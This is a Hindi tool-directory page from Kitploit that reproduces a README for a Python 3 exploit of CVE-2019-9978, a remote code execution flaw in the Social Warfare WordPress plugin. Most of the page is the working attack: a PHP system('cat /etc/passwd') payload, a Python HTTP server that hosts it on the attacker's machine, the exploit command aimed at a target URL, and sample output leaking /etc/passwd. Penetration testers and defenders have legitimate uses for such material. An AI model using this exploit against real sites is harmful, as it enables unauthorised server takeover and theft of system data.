Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9978 — वर्डप्रेस के लिए Social Warfare प्लगइन में एक Remote Code Execution (RCE) कमजोरी, जो 3.5.3 से नीचे के संस्करणों को प्रभावित करती है। | Kitploit
उपकरण/GitHubGitHub/echoosso/cve-2019-9978
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubechoosso/cve-2019-9978

CVE-2019-9978

वर्डप्रेस के लिए Social Warfare प्लगइन में एक Remote Code Execution (RCE) कमजोरी, जो 3.5.3 से नीचे के संस्करणों को प्रभावित करती है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-9978 - Social Warfare WordPress प्लगइन RCE < 3.5.3

WordPress के लिए Social Warfare प्लगइन में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी, जो 3.5.3 से नीचे के सभी संस्करणों को प्रभावित करती है।


💡 प्रेरणा

मूल सार्वजनिक शोषण Python के एक पुराने संस्करण में लिखा गया था और अब आधुनिक वातावरण में ठीक से नहीं चलता।
मैंने शोषण को Python 3 के साथ पूरी तरह से संगत होने के लिए फिर से लिखा, जिससे इसे उपयोग करना, समझना और आधुनिक टूलींग में एकीकृत करना आसान हो गया।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

✅ चरण 1 – पेलोड बनाएं

निम्नलिखित सामग्री के साथ payload.txt नामक एक फ़ाइल बनाएं:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ चरण 2 – Python HTTP सर्वर शुरू करें

अपने पेलोड को सर्व करने के लिए Python का उपयोग करें:

root@kitploit:~
python3 -m http.server 8000

यह आपके payload.txt को इस पते पर सुलभ बनाएगा:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ चरण 3 – शोषण चलाएं

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

अपेक्षित आउटपुट

यदि लक्ष्य असुरक्षित है, तो आपको इसके समान आउटपुट प्राप्त होगा:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

स्क्रीनशॉट

HTTP सर्वर को अनुरोध प्राप्त होता है

http-server

सफल शोषण निष्पादन

exploit

पेलोड फ़ाइल सामग्री

payload


🧬 यदि इस पेलोड ने आपका दिन बनाया, तो एक ⭐ मेरा दिन बनाएगा।

तकनीकी विवरण

  • प्लगइन: Social Warfare
  • प्रभावित संस्करण: < 3.5.3
  • CVE: CVE-2019-9978
  • कमजोरी का प्रकार: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • मूल लेखक: @hash3liZer
  • शोधकर्ता: Luka Sikic

क्रेडिट

  • शोषण लेखक: @hash3liZer
  • Python 3 पुनर्कार्य: @echosso

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए है।
जिन सिस्टमों के आप मालिक नहीं हैं, उनके खिलाफ इस शोषण का अनधिकृत उपयोग सख्त वर्जित है।

टूल डाउनलोड करें